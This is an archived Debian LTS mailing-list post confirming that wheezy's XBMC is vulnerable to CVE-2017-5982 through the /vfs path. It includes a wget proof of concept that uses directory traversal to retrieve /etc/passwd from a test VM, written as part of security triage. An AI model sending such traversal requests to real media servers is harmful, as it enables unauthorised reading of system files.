XBMC CVE-2017-5982

To: debian-lts@lists.debian.org
Subject: XBMC CVE-2017-5982
From: Brian May <brian@linuxpenguins.xyz>
Date: Wed, 05 Apr 2017 17:47:55 +1000
Message-id: <[🔎] 87h923i9ck.fsf@prune.linuxpenguins.xyz>

Just confirmed (after a reasonable amount of time) that XMBC in wheezy
is vulnerable to CVE-2017-5982 although the exploit is different.

When XBMC is run as root (yes, probably bad idea, this is a VM for
testing):

http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn

retrieves:

/root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn

Or:

wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd'

Downloads - guess what?

/etc/passwd

This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in
dla-needed.txt, however I have a suspicion that is incorrect.

However the information for CVE-2017-5982 is for /image not /vfs
-- 
Brian May <brian@linuxpenguins.xyz>
https://linuxpenguins.xyz/brian/

Reply to:

Follow-Ups:
- Re: XBMC CVE-2017-5982
  - From: Brian May <bam@debian.org>

Prev by Date: Re: CVE-2016-8685 in potrace
Next by Date: Wheezy update of proftpd-dfsg?
Previous by thread: LTS Activity report for March 2017
Next by thread: Re: XBMC CVE-2017-5982
Index(es):
- Date
- Thread